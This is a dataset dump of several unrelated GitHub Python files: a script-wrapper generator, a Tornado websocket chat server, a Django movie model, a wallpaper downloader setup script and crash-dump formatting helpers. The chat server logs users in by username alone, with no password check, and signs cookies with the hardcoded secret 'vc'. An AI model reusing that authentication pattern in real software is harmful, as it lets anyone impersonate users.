Constants.ACTIVATE_ENVIRONMENT_CUSTOM_SCRIPT_EXTRACTOR_METHOD_NAME,\r\n                                               args,\r\n                                               as_list=False,\r\n                                             )\r\n                if result is None:\r\n                    continue\r\n\r\n                # The result can be:\r\n                #\r\n                #       ( ExtractorMap, DirGenerators )\r\n                #       ( ExtractorMap, DirGenerator )\r\n                #       ExtractorMap\r\n\r\n                if isinstance(result, tuple):\r\n                    these_extractors, these_generators = result\r\n\r\n                    if not isinstance(these_generators, list):\r\n                        these_generators = [ these_generators, ]\r\n\r\n                    dir_generators += these_generators\r\n                else:\r\n                    these_extractors = result\r\n\r\n                for k, v in six.iteritems(these_extractors):\r\n                    if k in extractors:\r\n                        raise Exception(textwrap.dedent(\r\n                            \"\"\"\\\r\n                            A wrapper for '{ext}' was already defined.\r\n\r\n                            New:          {new_name} <{new_id}> [{new_root}]\r\n                            Original:     {original_name} <{original_id}> [{original_root}]\r\n                            \"\"\").format( ext=k,\r\n                                         new_name=repository.Name,\r\n                                         new_id=repository.Id,\r\n                                         new_root=repository.Root,\r\n                                         original_name=extractors[k].Repository.Name,\r\n                                         original_id=extractors[k].Repository.Id,\r\n                                         original_root=extractors[k].Repository.Root,\r\n                                       ))\r\n\r\n                    # Extracted values can be:\r\n                    #\r\n                    #       ( CreateCommands, CreateDocumentation, ScriptNameDecorator )\r\n                    #       ( CreateCommands, CreateDocumentation )\r\n                    #       ( CreateCommands )\r\n                    #       CreateCommands\r\n\r\n                    if not isinstance(v, tuple):\r\n                        v = ( v, )\r\n\r\n                    extractors[k] = ExtractorInfo( repository,\r\n                                                   v[0],\r\n                                                   v[1] if len(v) > 1 else lambda x: '',\r\n                                                   v[2] if len(v) > 2 else lambda filename: os.path.splitext(os.path.basename(filename))[0],\r\n                                                 )\r\n\r\n        # Get the scripts\r\n        if extractors:\r\n            script_infos = []\r\n\r\n            verbose_stream.write(\"Searching for content...\")\r\n            with verbose_stream.DoneManager( done_suffix=lambda: \"{} found\".format(inflect.no(\"script\", len(script_infos))),\r\n                                           ):\r\n\r\n                for repository in repositories:\r\n                    for dir_generator in dir_generators:\r\n                        # Generator values can be:\r\n                        #\r\n                        #       [ (str, recurse), ... ]\r\n                        #       [ str, ... 
]\r\n # (str, recurse)\r\n # str\r\n\r\n results = dir_generator(repository.Root, version_specs)\r\n if results is None:\r\n continue\r\n\r\n if not isinstance(results, list):\r\n results = [ results, ]\r\n\r\n for result in results:\r\n if isinstance(result, six.string_types):\r\n result = DirGeneratorResult(result, True)\r\n else:\r\n result = DirGeneratorResult(result[0], result[1])\r\n\r\n if not os.path.isdir(result.Dir):\r\n continue\r\n\r\n if result.Recurse:\r\n # ----------------------------------------------------------------------\r\n def GenerateFilenames():\r\n for item in CommonEnvironmentImports.FileSystem.WalkFiles( result.Dir,\r\n traverse_exclude_dir_names=[ lambda name: name.lower().endswith(\"impl\"),\r\n ],\r\n exclude_file_base_names=[ lambda name: name.lower().endswith(\"plugin\"),\r\n ],\r\n ):\r\n yield item\r\n\r\n # ----------------------------------------------------------------------\r\n else:\r\n # ----------------------------------------------------------------------\r\n def GenerateFilenames():\r\n for item in os.listdir(result.Dir):\r\n fullpath = os.path.join(result.Dir, item)\r\n\r\n if os.path.isfile(fullpath):\r\n yield fullpath\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n for script_filename in GenerateFilenames():\r\n ext = os.path.splitext(script_filename)[1]\r\n\r\n extractor = extractors.get(ext, None)\r\n if extractor is None:\r\n continue\r\n\r\n script_infos.append(ScriptInfo( repository,\r\n extractor,\r\n script_filename,\r\n ))\r\n\r\n if script_infos:\r\n wrappers = OrderedDict()\r\n\r\n verbose_stream.write(\"Creating script wrappers...\")\r\n with verbose_stream.DoneManager( done_suffix=lambda: \"{} written\".format(inflect.no(\"wrapper\", len(wrappers))),\r\n ) as dm:\r\n # We have a list of script files and the functions used to extract information\r\n # from them. Files were extracted based on repositories ordered from the lowest\r\n # to highest level. 
However, it is likely that the user will want to use scripts\r\n                # from high-level repositories more often than lower-level ones when names collide.\r\n                # Reverse the order so that the higher-level scripts get the standard name while conflicts\r\n                # in lower-level libraries are renamed.\r\n                script_infos.reverse()\r\n\r\n                for script_info in script_infos:\r\n                    these_commands = script_info.Extractor.CreateCommandsFunc(script_info.Filename)\r\n                    if these_commands is None:\r\n                        continue\r\n\r\n                    # Create a unique name for the wrapper\r\n                    base_name = script_info.Extractor.ScriptNameDecoratorFunc(script_info.Filename)\r\n\r\n                    conflicts = []\r\n\r\n                    while True:\r\n                        potential_filename = os.path.join(dest_dir, \"{}{}{}\".format( base_name,\r\n                                                                                     len(conflicts) + 1 if conflicts else '',\r\n                                                                                     CommonEnvironmentImports.CurrentShell.ScriptExtension,\r\n                                                                                   ))\r\n\r\n                        if potential_filename in wrappers:\r\n                            conflicts.append(wrappers[potential_filename])\r\n                        else:\r\n                            break\r\n\r\n                        base_name = os.path.splitext(os.path.basename(potential_filename))[0]\r\n\r\n                    if conflicts and no_display_conflicts:\r\n                        dm.stream.write(textwrap.dedent(\r\n                            \"\"\"\\\r\n                            The wrapper script for '{original_name}' has been renamed '{new_name}' to avoid naming conflicts with:\r\n                            {conflicts}\r\n                            \"\"\").format( original_name=script_info.Filename,\r\n                                         new_name=base_name,\r\n                                         conflicts='\\n'.join([ \" - {}\".format(wrapped_item.ScriptInfo.Filename) for wrapped_item in conflicts ]),\r\n                                       ))\r\n\r\n                    with open(potential_filename, 'w') as f:\r\n                        f.write(CommonEnvironmentImports.CurrentShell.GenerateCommands(these_commands))\r\n\r\n                    CommonEnvironmentImports.CurrentShell.MakeFileExecutable(potential_filename)\r\n\r\n                    assert script_info.Filename.startswith(script_info.Repo.Root), (script_info.Filename, script_info.Repo.Root)\r\n                    display_location = script_info.Filename[len(script_info.Repo.Root):].lstrip(os.path.sep)\r\n\r\n                    assert display_location.startswith(Constants.SCRIPTS_SUBDIR), display_location\r\n                    display_location = display_location[len(Constants.SCRIPTS_SUBDIR):].lstrip(os.path.sep)\r\n\r\n                    wrappers[potential_filename] = WrappedItem( base_name,\r\n                                                                display_location,\r\n                                                                script_info.Extractor.CreateDocumentationFunc(script_info.Filename),\r\n                                                                script_info,\r\n                                                              )\r\n\r\n                    if generate_extensionless_links:\r\n                        extensionless_link = os.path.splitext(potential_filename)[0]\r\n\r\n                        CommonEnvironmentImports.CurrentShell.CreateSymLink(\r\n                            extensionless_link,\r\n                            potential_filename,\r\n                        )\r\n                        CommonEnvironmentImports.CurrentShell.MakeFileExecutable(extensionless_link)\r\n\r\n            if wrappers:\r\n                verbose_stream.write(\"Creating '{}'...\".format(Constants.SCRIPT_LIST_NAME))\r\n                with verbose_stream.DoneManager():\r\n                    these_commands = [ CommonEnvironmentImports.CurrentShell.Commands.EchoOff(),\r\n                                       CommonEnvironmentImports.CurrentShell.Commands.Message(\"\\nAvailable scripts are:\\n\"),\r\n                                     ]\r\n\r\n                    prev_repo = None\r\n\r\n                    # Above, we reversed the items so we could order from most-specific to least-specific. 
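# (Illustrative aside, not part of the original file: with repositories
# [low, mid, high], the reversal above processes scripts as [high, mid, low],
# so a high-level 'Foo' keeps its wrapper name while colliding lower-level
# scripts become 'Foo2', 'Foo3', and so on; the second reversal below merely
# restores low-to-high order for display.)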
Here,\r\n # we want to order from least-specific to most specific.\r\n wrapper_infos = list(six.itervalues(wrappers))\r\n wrapper_infos.reverse()\r\n\r\n for wrapper_info in wrapper_infos:\r\n if wrapper_info.ScriptInfo.Repo != prev_repo:\r\n header = \"{name:<70} {location:>80}\".format( name=\"{} <{}>\".format(wrapper_info.ScriptInfo.Repo.Name, wrapper_info.ScriptInfo.Repo.Id),\r\n location=wrapper_info.ScriptInfo.Repo.Root,\r\n )\r\n\r\n these_commands.append(CommonEnvironmentImports.CurrentShell.Commands.Message(textwrap.dedent(\r\n \"\"\"\\\r\n {sep}\r\n {header}\r\n {sep}\r\n \"\"\").format( header=header,\r\n sep='=' * len(header),\r\n )))\r\n\r\n prev_repo = wrapper_info.ScriptInfo.Repo\r\n\r\n content = \"{0:<68} {1:>78}\".format(CommonEnvironmentImports.CurrentShell.CreateScriptName(wrapper_info.Name, filename_only=True), wrapper_info.DisplayName)\r\n content += \"\\n{}\\n\".format('-' * len(content))\r\n\r\n if wrapper_info.Desc:\r\n content += \"{}\\n\".format(CommonEnvironmentImports.StringHelpers.LeftJustify(wrapper_info.Desc, 2, skip_first_line=False))\r\n\r\n these_commands.append(CommonEnvironmentImports.CurrentShell.Commands.Message(CommonEnvironmentImports.StringHelpers.LeftJustify(content, 4, skip_first_line=False)))\r\n\r\n filename = os.path.join(dest_dir, CommonEnvironmentImports.CurrentShell.CreateScriptName(Constants.SCRIPT_LIST_NAME, filename_only=True))\r\n\r\n with open(filename, 'w') as f:\r\n f.write(CommonEnvironmentImports.CurrentShell.GenerateCommands(these_commands))\r\n\r\n CommonEnvironmentImports.CurrentShell.MakeFileExecutable(filename)\r\n\r\n # Write output\r\n lines = textwrap.dedent(\r\n # pylint: disable = C0330\r\n \"\"\"\\\r\n Shell wrappers have been created for all the recognized files contained within the directory\r\n '{script_dir}' across all repositories. 
For a complete list of these wrappers, run:\r\n\r\n                    {script_name}\r\n                \"\"\").format( script_dir=cls.Name,\r\n                             script_name=os.path.basename(filename),\r\n                           ).rstrip().split('\\n')\r\n\r\n        max_length = max(*[ len(line) for line in lines ])\r\n        centered_template = \"| {{:^{}}} |\".format(max_length)\r\n\r\n        output_stream.write(textwrap.dedent(\r\n            \"\"\"\\\r\n\r\n            {line}\r\n            | {whitespace} |\r\n            {content}\r\n            | {whitespace} |\r\n            {line}\r\n\r\n            \"\"\").format( line='-' * (max_length + 6),\r\n                         whitespace=' ' * max_length,\r\n                         content='\\n'.join([ centered_template.format(line) for line in lines ]),\r\n                       ))\r\n\r\n        return [\r\n                   CommonEnvironmentImports.CurrentShell.Commands.AugmentPath(dest_dir),\r\n               ]\r\n","repo_name":"davidbrownell/Common_Environment_v3","sub_path":"RepositoryBootstrap/Impl/ActivationActivity/ScriptsActivationActivity.py","file_name":"ScriptsActivationActivity.py","file_ext":"py","file_size_in_byte":22083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"7397426677","text":"#-*- encoding:utf-8 -*-\nimport tornado.web, tornado.websocket\nimport tornado.httpserver\nimport tornado.ioloop\nimport os\nimport json\nfrom tornado.options import define, options\n\nvalid_user_dict = {'weichao': 'weichao',\n                   'chenchen6': 'chenchen6',\n                   'xuzongpeng': 'xuzongpeng',\n                   'liuwentong1': 'liuwentong1',\n                   'jiaou': 'jiaou',\n                   'chenjun': 'chenjun',\n                   'panglijun': 'panglijun',\n                   'yangke1': 'yangke1',\n                   'liuyuqin': 'liuyuqin',\n                   'longcangjian1': 'longcangjian1'}\ndefine(\"port\", default=9000, help=\"run on the given port\", type=int)\n\nclass SocketHandler(tornado.websocket.WebSocketHandler):\n    clients = {}\n    client_id_to_num_map = {}\n\n    def open(self):\n        self.write_message({'type': 'sys', 'msg': 'hello, Welcome to WebSocket'})\n        #broadcast a notification when a new user joins\n        client_id = id(self)\n        SocketHandler.clients[client_id] = self\n\n\n    @staticmethod\n    def send_to_all(message):\n        for c in SocketHandler.clients.values():\n            c.write_message(message)\n\n    def on_close(self):\n        uid = id(self)\n        u_number = SocketHandler.client_id_to_num_map[uid]\n        if uid in SocketHandler.client_id_to_num_map:\n            del SocketHandler.client_id_to_num_map[uid]\n        if uid in SocketHandler.clients:\n            del SocketHandler.clients[uid]\n        for friend_client_id in SocketHandler.clients.keys():\n            SocketHandler.send_broadcast_msg(u_number, friend_client_id, 'offline')\n\n    def update_client(self, client_id, client_number):\n        for k, v in SocketHandler.client_id_to_num_map.items():\n            if v == client_number:\n                del SocketHandler.client_id_to_num_map[k]\n        SocketHandler.client_id_to_num_map[client_id] = client_number\n\n    @staticmethod\n    def send_broadcast_msg(from_client_number, to_client_id, msg_type):\n        msg_object = {'type': msg_type, 'from_client_number': from_client_number}\n        if to_client_id in SocketHandler.clients:\n            SocketHandler.clients[to_client_id].write_message(msg_object)\n\n    def on_message(self, message):\n        \"\"\"\n        {'type': 'init', 'client_number': 22} is an initialization message\n        {'from': 22, 'to': 33, 'message': 'xxx'} is a message that needs to be relayed\n        :param message:\n        :return:\n        \"\"\"\n        client_id = id(self)\n        initJson = json.loads(message)\n        if u'type' in initJson and initJson[u'type'] == u'init':\n            client_number = initJson[u'client_number']\n            self.update_client(client_id, client_number)\n            for friend_client_id in SocketHandler.clients.keys():\n                if friend_client_id != client_id:\n                    SocketHandler.send_broadcast_msg(client_number, friend_client_id, 'online')\n        elif u'to' in initJson and u'message' in initJson:\n            to_client_number = 
initJson[u'to']\n msg = initJson[u'message']\n from_client_id = client_id\n from_client_number = SocketHandler.client_id_to_num_map[from_client_id]\n for k, v in SocketHandler.client_id_to_num_map.items():\n if v == to_client_number:\n SocketHandler.clients[k].write_message(json.dumps({'type': 'user', 'from_client_id': from_client_id, 'from_client_number': from_client_number, 'msg': msg}))\n\nclass BaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n return self.get_secure_cookie(\"username\")\n\nclass IndexHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n self.render('templates/index.html', user=self.current_user)\n\nclass LogoutHandler(BaseHandler):\n def post(self):\n self.clear_cookie(\"username\")\n self.redirect(\"/\")\n\n\nclass LoginHander(BaseHandler):\n def get(self):\n self.render('templates/login.html')\n\n def post(self):\n user = self.get_argument(\"username\")\n if user not in valid_user_dict:\n self.redirect('/login')\n return\n self.set_secure_cookie(\"username\", user)\n self.redirect(\"/\")\n\n\nclass GetClients(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n self.write(SocketHandler.client_id_to_num_map)\n\nif __name__ == '__main__':\n settings = {\"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"cookie_secret\": \"vc\",\n \"login_url\": \"/login\"}\n app = tornado.web.Application([\n (r'/', IndexHandler),\n (r'/login', LoginHander),\n (r'/logout', LogoutHandler),\n (r'/soc', SocketHandler),\n (r'/clients', GetClients),\n ], debug=True, **settings)\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"supercj92/websocket-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15329741719","text":"from django.db import models\nimport uuid\nfrom django.conf import settings\n\n# Create your models here.\nclass Movie(models.Model):\n\n GENRE_CHOICES = [\n ('action', 'Action'),\n ('comedy', 'Comedy'),\n ('drama', 'Drama'),\n ('horror', 'Horror'),\n ('romance', 'Romance'),\n ('science_fiction', 'Science Fiction'),\n ('fantasy', 'Fantasy'),\n ]\n\n uu_id = models.UUIDField(default=uuid.uuid4)\n title = models.CharField(max_length=255)\n description = models.TextField()\n release_date = models.DateField()\n genre = models.CharField(max_length=100, choices=GENRE_CHOICES)\n length = models.PositiveIntegerField()\n image_card = models.ImageField(upload_to='movie_images/')\n image_cover = models.ImageField(upload_to='movie_images/')\n video = models.FileField(upload_to='movie_videos/')\n movie_views = models.IntegerField(default=0)\n\n def __str__(self):\n return self.title\n \nclass MovieList(models.Model):\n owner_user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n )\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE)","repo_name":"tomitokko/django-netflix-clone","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14355291723","text":"from img_downloader import source_code_shortner\nfrom img_downloader import inter_add_new_img\nfrom bs4 import BeautifulSoup\nfrom bs4 import SoupStrainer\nimport urllib.request\nimport re\nimport pickle\nfrom config import *\nprint('Enter genres 
of wallpaper you like')\nwhile True:\n genere=input()\n generes[genere]=[1,1]\n print('add more(yes/no)')\n choice=input()\n if choice !='yes':\n break\nfile=open('temp.pickle','wb')\npickle.dump(generes,file)\nfile.close()\nfile=open('genere_count_data.pickle','wb')\nprint('counting the number of wallpapers in each genre')\nfor genere in generes:\n url='https://wall.alphacoders.com/search.php?search='+genere\n only_h1_tags=SoupStrainer('h1')\n source_code=urllib.request.urlopen(url)\n source_code=source_code_shortner(source_code,700,800)\n soup=BeautifulSoup(source_code,'html.parser',parse_only=only_h1_tags)\n re_str=str(soup.contents[0])\n result=re.search(' [0-9]* ',re_str)\n genere_wallpic_count[genere]=int(result.group())\n print(str(result.group())+' wallpapers found in '+genere)\npickle.dump(genere_wallpic_count,file)\nfile.close()\nprint('Do you want to download initial wallpapers(It might take time)(yes/no)')\ninput=input()\nif input == 'yes':\n # Download 10 wallpapers\n print('downloading initial wallpapers')\n for _ in range(10):\n inter_add_new_img()\nelse:\n print('Then copy 10 wallpapers of your choice to the directory '+wallpic_dir)\n# set the app to startup\nos.rename(\n 'main.pyw - Shortcut.lnk',\n'C:\\\\Users\\\\'+os.getlogin()+'\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\main.pyw - Shortcut.lnk')\nprint('Restart your computer to launch the application')\n","repo_name":"sanchit96N/WALLPICker","sub_path":"first_time_only.py","file_name":"first_time_only.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15102955794","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;\n\ncrashdump_use_jinja2 = False\n\ndef _(msg):\n return msg\n\ndef tag_a(name, title=None, href=None, alt=None):\n from xml.etree.ElementTree import Element, tostring\n a = Element('a')\n a.text = name\n if href:\n a.set('href', href)\n if title:\n a.set('title', title)\n if alt:\n a.set('alt', alt)\n return tostring(a, encoding=\"utf8\", method='html').decode()\n\ndef _hex_format(number, prefix='0x', width=None, bits=None):\n if isinstance(number, str):\n try:\n number = int(number)\n except ValueError:\n number = None\n if number is None:\n return '(none)'\n if bits is not None:\n if bits == 32:\n number = number & 0xffffffff\n if width is None:\n width = 8\n elif bits == 64:\n number = number & 0xffffffffffffffff\n if width is None:\n width = 16\n\n if width is None:\n if number > 2**48:\n width = 16\n elif number > 2**40:\n width = 12\n elif number > 2**32:\n width = 10\n elif number > 2**24:\n width = 8\n elif number > 2**16:\n width = 6\n elif number > 2**8:\n width = 4\n else:\n width = 2\n fmt = '%%0%ix' % width\n return prefix + fmt % number\n\ndef hex_format(number, prefix='0x', width=None, bits=None):\n if isinstance(number, list):\n nums = []\n for n in number:\n nums.append(_hex_format(n, prefix, width, bits))\n return ','.join(nums)\n else:\n return _hex_format(number, prefix, width, bits)\n\ndef hex_format_bits(number, bits):\n return hex_format(number, bits=bits)\n\ndef addr_format(number, prefix='0x', bits=64):\n if number == 0:\n return 'NULL'\n elif number < 256:\n return hex_format(number, 'NULL+' + prefix, bits=bits)\n else:\n return hex_format(number, prefix, bits=bits)\n\ndef addr_format_64(number, prefix='0x'):\n if number == 0:\n return 'NULL'\n elif number < 
256:\n return hex_format(number, 'NULL+' + prefix, bits=64)\n else:\n return hex_format(number, prefix, bits=64)\n\ndef addr_format_32(number, prefix='0x'):\n if number == 0:\n return 'NULL'\n elif number < 256:\n return hex_format(number, 'NULL+' + prefix, bits=32)\n else:\n return hex_format(number, prefix, bits=32)\n\ndef addr_format_bits(number, bits=64):\n return addr_format(number, bits=bits)\n\ndef exception_code(platform_type, code, name):\n if platform_type is None:\n return 'Platform unknown'\n elif platform_type == 'Linux':\n return tag_a(str(name) + '(' + hex_format(code) + ')', href='https://en.wikipedia.org/wiki/Unix_signal')\n elif platform_type == 'Windows NT':\n return tag_a(str(name) + '(' + hex_format(code) + ')', href='https://en.wikipedia.org/wiki/Windows_NT')\n elif platform_type == 'Windows':\n return tag_a(str(name) + '(' + hex_format(code) + ')', href='https://en.wikipedia.org/wiki/Microsoft_Windows')\n else:\n return tag_a(str(name) + '(' + hex_format(code) + ')', href='https://en.wikipedia.org/wiki/Special:Search/' + str(platform_type))\n\ndef format_bool_yesno(val):\n if isinstance(val, str) or isinstance(val, unicode):\n try:\n val = bool(val)\n except ValueError:\n val = None\n if val is None:\n return '(none)'\n elif val == True:\n return _('yes')\n elif val == False:\n return _('no')\n else:\n return _('neither')\n\ndef format_source_line(source, line, line_offset=None, source_url=None):\n if source is None:\n return _('unknown')\n else:\n title = str(source) + ':' + str(line)\n if line_offset is not None:\n title += '+' + hex_format(line_offset)\n if source_url is not None:\n href = source_url\n else:\n href='file:///' + str(source)\n return tag_a(title, href=href)\n\ndef format_function_plus_offset(function, funcoff=None):\n if function is None:\n return _('unknown')\n else:\n if funcoff:\n return str(function) + '+' + hex_format(funcoff)\n else:\n return str(function)\n\ndef str_or_unknown(str):\n if str is None:\n return _('unknown')\n else:\n return str\n\ndef format_cpu_type(cputype):\n cputype = cputype.lower()\n if cputype == 'amd64':\n href='http://en.wikipedia.org/wiki/X86-64'\n title = 'x86-64 (also known as x64, x86_64 and AMD64)'\n elif cputype == 'x86':\n href='http://en.wikipedia.org/wiki/X86'\n title = 'x86 (also known as i386)'\n elif cputype == 'mips':\n href='http://en.wikipedia.org/wiki/MIPS_instruction_set'\n title = 'MIPS instruction set'\n elif cputype == 'alpha':\n href='http://en.wikipedia.org/wiki/DEC_Alpha'\n title = 'Alpha, originally known as Alpha AXP'\n elif cputype == 'alpha64':\n href='http://en.wikipedia.org/wiki/DEC_Alpha'\n title = 'Alpha64, originally known as Alpha AXP'\n elif cputype == 'powerpc':\n href='http://en.wikipedia.org/wiki/PowerPC'\n title = 'PowerPC'\n elif cputype == 'powerpc64':\n href='http://en.wikipedia.org/wiki/Ppc64'\n title = 'PowerPC64 or ppc64'\n elif cputype == 'arm':\n href='http://en.wikipedia.org/wiki/ARM_architecture'\n title = 'ARM'\n elif cputype == 'arm64':\n href='http://en.wikipedia.org/wiki/ARM_architecture#64-bit'\n title = 'ARM 64-bit'\n elif cputype == 'sparc':\n href='http://en.wikipedia.org/wiki/SPARC'\n title = 'SPARC (\"scalable processor architecture\")'\n elif cputype == 'ia64':\n href='http://en.wikipedia.org/wiki/Itanium'\n title = 'Intel Itanium architecture (IA-64)'\n elif cputype == 'msil':\n href='http://en.wikipedia.org/wiki/Common_Intermediate_Language'\n title = 'Microsoft Intermediate Language (MSIL)'\n elif cputype == 'x64 wow':\n 
href='http://en.wikipedia.org/wiki/WoW64'\n title = 'Microsoft WoW64'\n else:\n href = 'http://en.wikipedia.org/wiki/Central_processing_unit'\n title = 'Unknown:%s' % cputype\n return tag_a(title, title=cputype, href=href)\n\ndef format_cpu_vendor(vendor):\n if vendor == 'AuthenticAMD':\n title = 'AMD'\n href = 'http://en.wikipedia.org/wiki/Advanced_Micro_Devices'\n elif vendor == 'GenuineIntel':\n title = 'Intel'\n href = 'http://en.wikipedia.org/wiki/Intel'\n elif vendor == 'Microsoft Hv':\n title = 'Microsoft Hyper-V'\n href = 'http://en.wikipedia.org/wiki/Hyper-V'\n elif vendor == 'VMwareVMware':\n title = 'VMware'\n href = 'http://en.wikipedia.org/wiki/VMware'\n elif vendor == 'KVMKVMKVMKVM':\n title = 'KVM'\n href = 'http://en.wikipedia.org/wiki/Kernel-based_Virtual_Machine'\n elif vendor == 'XenVMMXenVMM':\n title = 'Xen'\n href = 'http://en.wikipedia.org/wiki/Xen'\n else:\n title = vendor\n href = 'http://en.wikipedia.org/wiki/List_of_x86_manufacturers'\n return tag_a(title, title=vendor, href=href)\n\ndef format_cpu_name(vendor, name):\n # http://en.wikipedia.org/wiki/CPUID\n # http://www.sandpile.org/x86/cpuid.htm\n if vendor == 'AuthenticAMD':\n if name is None:\n title = 'Unknown AMD CPU'\n href = 'http://en.wikipedia.org/wiki/Advanced_Micro_Devices'\n elif name.startswith('AMD Ryzen'):\n href = 'https://en.wikipedia.org/wiki/Ryzen'\n title = 'AMD Ryzen'\n elif name.startswith('AMD FX'):\n href = 'http://en.wikipedia.org/wiki/List_of_AMD_FX_microprocessors'\n title = 'AMD FX-series'\n elif name.startswith('AMD Phenom'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_Phenom_microprocessors'\n title = 'AMD Phenom family'\n elif name.startswith('AMD Opteron'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_Opteron_microprocessors'\n title = 'AMD Opteron family'\n elif name.startswith('AMD Sempron'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_Sempron_microprocessors'\n title = 'AMD Sempron family'\n elif name.startswith('AMD Turion'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_Turion_microprocessors'\n title = 'AMD Turion family'\n elif name.startswith('AMD A'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_accelerated_processing_unit_microprocessors'\n title = 'AMD APU series'\n else:\n title = 'Unknown AMD CPU'\n href = 'http://en.wikipedia.org/wiki/Advanced_Micro_Devices'\n title = title + ' (%s)' % name\n elif vendor == 'GenuineIntel':\n if name is None:\n title = 'Unknown Intel CPU'\n href = 'https://en.wikipedia.org/wiki/List_of_Intel_microprocessors'\n elif name.startswith('Intel(R) Core(TM) i3'):\n title = 'Intel Core i3 series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Core(TM) i5'):\n title = 'Intel Core i5 series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Core(TM) i7'):\n title = 'Intel Core i7 series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Core(TM) i9'):\n title = 'Intel Core i9 series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Core(TM)'):\n title = 'Unknown Intel Core series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Xeon(R)') or name.startswith('Intel(R) Xeon(TM)'):\n title = 'Intel Xeon series'\n href = 'http://en.wikipedia.org/wiki/Xeon'\n else:\n title = 'Unknown Intel CPU'\n href = 'https://en.wikipedia.org/wiki/List_of_Intel_microprocessors'\n title = title + ' (%s)' % name\n else:\n title = name\n href = 
'http://en.wikipedia.org/wiki/List_of_x86_manufacturers'\n return tag_a(name, title=title, href=href)\n\ndef format_distribution_id(distro_id):\n if distro_id == 'Debian':\n name = 'Debian'\n href = 'http://www.debian.org'\n elif distro_id == 'Ubuntu':\n name = 'Ubuntu'\n href = 'http://www.ubuntu.com'\n else:\n name = distro_id\n href = 'http://distrowatch.com/' + distro_id\n return tag_a(name, title=distro_id, href=href)\n\ndef format_distribution_codename(distro_id, distro_codename):\n if distro_id == 'Debian':\n name = '%s %s' % (distro_id.capitalize(), distro_codename.capitalize())\n href = 'http://www.debian.org/%s%s' % (distro_id.capitalize(), distro_codename.capitalize())\n elif distro_id == 'Ubuntu':\n name = '%s %s' % (distro_id.capitalize(), distro_codename.capitalize())\n href = 'http://ubuntuguide.org/wiki/%s_%s' % (distro_id.capitalize(), distro_codename.capitalize())\n else:\n name = distro_id\n href = 'http://distrowatch.com/' + distro_id\n return tag_a(name, title=distro_id, href=href)\n\ndef format_seconds(s):\n if s is None:\n return 'None'\n elif s >= 3600:\n hr = int(float(s) / 3600.0)\n from math import fmod\n m = fmod(float(s), 3600.0) / 60.0\n return '%ihr %0.1fmin' % (hr, m)\n elif s >= 60:\n m = float(s) / 60.0\n return '%0.1fmin' % m\n elif s >= 1:\n return '%0.1fs' % s\n else:\n return '%0.1fms' % ( s * 1000.0 )\n\ndef format_milliseconds(ms):\n if ms is None:\n return 'None'\n elif ms > 1000:\n s = float(ms) / 1000.0\n return format_seconds(s)\n else:\n return '%ims' % ms\n\ndef format_trust_level(tl):\n if tl == 0 or tl is None:\n return 'Unknown'\n elif tl == 1:\n return 'Stack scan'\n elif tl == 2:\n return 'CFI scan'\n elif tl == 3:\n return 'FP'\n elif tl == 4:\n return 'CFI'\n elif tl == 5:\n return 'External'\n elif tl == 6:\n return 'IP'\n else:\n return 'unknown(%i)' % tl\n\n_suffixes = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']\ndef format_size(nbytes):\n if isinstance(nbytes, str):\n try:\n nbytes = int(nbytes)\n except ValueError:\n nbytes = None\n if nbytes == 0: return '0 B'\n elif nbytes is None: return 'None'\n i = 0\n while nbytes >= 1024 and i < len(_suffixes)-1:\n nbytes /= 1024.\n i += 1\n f = ('%.2f' % nbytes).rstrip('0').rstrip('.')\n return '%s %s' % (f, _suffixes[i])\n\ndef format_memory_usagetype(usage):\n if usage == 0 or usage is None:\n return 'Unknown'\n elif usage == 1:\n return 'Stack'\n elif usage == 2:\n return 'TEB'\n elif usage == 3:\n return 'PEB'\n elif usage == 4:\n return 'Process Parameters'\n elif usage == 5:\n return 'Environment'\n elif usage == 6:\n return 'IP'\n elif usage == 7:\n return 'Process Heap Handles'\n elif usage == 8:\n return 'Process Heap'\n elif usage == 9:\n return 'TLS'\n elif usage == 10:\n return 'Thread info block'\n else:\n return 'unknown(%i)' % usage\n\ndef format_gl_extension_name(ext):\n khronos_extension_base_url = 'https://www.khronos.org/registry/OpenGL/extensions'\n unknown_extension_url = 'https://www.khronos.org/opengl/wiki/OpenGL_Extension'\n title = ext\n name = ext\n href = unknown_extension_url\n vendor = None\n ext_name = None\n if ext.startswith('GL_'):\n vendor_end = ext.index('_', 3)\n if vendor_end > 0:\n vendor = ext[3:vendor_end]\n ext_name = ext[3:]\n elif ext.startswith('GLX_') or ext.startswith('WGL_'):\n vendor_end = ext.index('_', 4)\n if vendor_end > 